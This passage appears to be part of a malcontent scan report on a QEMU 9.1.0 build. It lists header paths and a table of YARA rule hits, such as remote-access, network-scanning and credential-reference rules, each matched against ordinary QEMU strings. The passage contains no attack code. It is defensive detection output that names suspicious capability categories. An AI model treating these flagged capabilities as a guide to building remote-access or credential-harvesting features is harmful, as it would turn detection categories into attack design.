[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/esp.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fesp.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/scsi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fscsi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sdhci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsdhci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sysbus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsysbus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/imx-usb-phy](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fimx-usb-phy&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/msd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fmsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-commo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-commo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-conta](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-conta&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vdpa-dev](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvdpa-dev&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-sc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-sc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-us](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-us&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-vs](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-vs&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-b](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-b&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-c](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-c&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-g](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-g&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-n](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-n&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-p](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-p&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-r](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-r&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-s](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-s&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vmstate-if.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvmstate-if.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-buffer.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-buffer.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-command](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-command&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-file.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-file.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-null.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-null.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-socket.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-socket.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-tls.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-tls.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-websock](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-websock&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/dns-resolver.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fdns-resolver.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/net-listener.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fnet-listener.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/can_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Fcan_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/filter.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Ffilter.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qapi/qmp/qobject.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqapi%2Fqmp%2Fqobject.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bitops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbitops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bswap.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbswap.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/coroutine.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fcoroutine.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/int128.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fint128.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/iov.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fiov.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/lockable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Flockable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/main-loop.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fmain-loop.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/range.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frange.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/ratelimit.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fratelimit.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/rcu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frcu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/thread-contex](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fthread-contex&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qom/object_interfa](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqom%2Fobject_interfa&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/scsi/pr-manager.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fscsi%2Fpr-manager.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/accel-ops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Faccel-ops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/cryptodev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fcryptodev.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/event-loop-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fevent-loop-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/host_iommu_](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fhost_iommu_&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/hostmem.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fhostmem.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/iothread.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fiothread.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng-random.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng-random.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm_backend](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm_backend&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/vhost-user-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fvhost-user-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/console.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fconsole.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/dbus-display.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fdbus-display.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/qemu-spice.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fqemu-spice.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/migration/channel-block.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fmigration%2Fchannel-block.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/tcg/i386/tcg-target.c.inc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftcg%2Fi386%2Ftcg-target.c.inc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/trace/control-internal.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftrace%2Fcontrol-internal.h&type=code) | -| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | -| MEDIUM | [fs/proc/pid_cmdline](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-cmdline.yara#proc_cmdline) | access command-line of other processes | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | -| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | -| MEDIUM | [hw/dev/block_ice](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/block-device.yara#block_devices) | works with block devices | [/dev/block/%u](https://github.com/search?q=%2Fdev%2Fblock%2F%25u&type=code)
[/sys/dev/block](https://github.com/search?q=%2Fsys%2Fdev%2Fblock&type=code) | -| MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | -| MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | exec chdir and socket | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | -| MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | -| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping 0x](https://github.com/search?q=ping+0x&type=code) | -| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | -| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code) | -| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | -| MEDIUM | [net/remote_control/vnc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/remote_control/vnc.yara#vnc_user) | vnc user | [VNC_](https://github.com/search?q=VNC_&type=code)
[vnc_password](https://github.com/search?q=vnc_password&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | -| MEDIUM | [net/tcp/sftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/sftp.yara#sftp) | Supports sftp (FTP over SSH) | [sftp](https://github.com/search?q=sftp&type=code)
[ssh](https://github.com/search?q=ssh&type=code) | -| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | -| MEDIUM | [net/tun_tap](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tun_tap.yara#tun_tap) | accesses the TUN/TAP device driver | [/dev/net/tun](https://github.com/search?q=%2Fdev%2Fnet%2Ftun&type=code) | -| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [-daemon](https://github.com/search?q=-daemon&type=code)
[daemonize](https://github.com/search?q=daemonize&type=code)
[is_daemon](https://github.com/search?q=is_daemon&type=code)
[os_daemon](https://github.com/search?q=os_daemon&type=code)
[os_set_daemon](https://github.com/search?q=os_set_daemon&type=code)
[qemu_daemon](https://github.com/search?q=qemu_daemon&type=code) | -| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [pid_file](https://github.com/search?q=pid_file&type=code) | -| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [d is not known!!](https://github.com/search?q=d+is+not+known%21%21&type=code) | -| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept_dev](https://github.com/search?q=intercept_dev&type=code)
[intercept_gpio_out](https://github.com/search?q=intercept_gpio_out&type=code)
[intercept_in](https://github.com/search?q=intercept_in&type=code)
[intercept_out](https://github.com/search?q=intercept_out&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | -| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Cannot derive password](https://github.com/search?q=Cannot+derive+password&type=code)
[Could not set password expire time](https://github.com/search?q=Could+not+set+password+expire+time&type=code)
[Invalid password](https://github.com/search?q=Invalid+password&type=code)
[SetPasswordAction_lookup](https://github.com/search?q=SetPasswordAction_lookup&type=code)
[change-vnc-password](https://github.com/search?q=change-vnc-password&type=code)
[enter_expire_password](https://github.com/search?q=enter_expire_password&type=code)
[exit_change_vnc_password](https://github.com/search?q=exit_change_vnc_password&type=code)
[hmp_expire_password](https://github.com/search?q=hmp_expire_password&type=code)
[hmp_set_password](https://github.com/search?q=hmp_set_password&type=code)
[marshal_expire_password](https://github.com/search?q=marshal_expire_password&type=code)
[monitor_read_password](https://github.com/search?q=monitor_read_password&type=code)
[not support password prompting](https://github.com/search?q=not+support+password+prompting&type=code)
[obj_change_vnc_password_arg_members](https://github.com/search?q=obj_change_vnc_password_arg_members&type=code)
[password is expired](https://github.com/search?q=password+is+expired&type=code)
[password is not set](https://github.com/search?q=password+is+not+set&type=code)
[please enable password auth using](https://github.com/search?q=please+enable+password+auth+using&type=code)
[prop_get_passwordid](https://github.com/search?q=prop_get_passwordid&type=code)
[prop_set_passwordid](https://github.com/search?q=prop_set_passwordid&type=code)
[protocol password](https://github.com/search?q=protocol+password&type=code)
[proxy-password-secret](https://github.com/search?q=proxy-password-secret&type=code)
[qapi_free_ExpirePasswordOptionsVnc](https://github.com/search?q=qapi_free_ExpirePasswordOptionsVnc&type=code)
[qapi_free_SetPasswordOptionsVnc](https://github.com/search?q=qapi_free_SetPasswordOptionsVnc&type=code)
[qmp_change_vnc_password](https://github.com/search?q=qmp_change_vnc_password&type=code)
[qmp_enter_set_password](https://github.com/search?q=qmp_enter_set_password&type=code)
[qmp_exit_expire_password](https://github.com/search?q=qmp_exit_expire_password&type=code)
[qmp_exit_set_password](https://github.com/search?q=qmp_exit_set_password&type=code)
[qmp_expire_password](https://github.com/search?q=qmp_expire_password&type=code)
[qmp_marshal_set_password](https://github.com/search?q=qmp_marshal_set_password&type=code)
[qmp_set_password](https://github.com/search?q=qmp_set_password&type=code)
[that match this password](https://github.com/search?q=that+match+this+password&type=code)
[type_ExpirePasswordOptionsVnc](https://github.com/search?q=type_ExpirePasswordOptionsVnc&type=code)
[type_ExpirePasswordOptions_members](https://github.com/search?q=type_ExpirePasswordOptions_members&type=code)
[visit_type_SetPasswordAction](https://github.com/search?q=visit_type_SetPasswordAction&type=code)
[visit_type_SetPasswordOptionsVnc](https://github.com/search?q=visit_type_SetPasswordOptionsVnc&type=code)
[visit_type_SetPasswordOptions_members](https://github.com/search?q=visit_type_SetPasswordOptions_members&type=code)
[vnc password expire-time](https://github.com/search?q=vnc+password+expire-time&type=code)
[vnc_display_password](https://github.com/search?q=vnc_display_password&type=code) | -| LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [private_key](https://github.com/search?q=private_key&type=code) | -| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | -| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code) | -| LOW | [data/compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | -| LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | -| LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [ZSTD_decompressStream](https://github.com/search?q=ZSTD_decompressStream&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | -| LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | -| LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | -| LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | -| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | 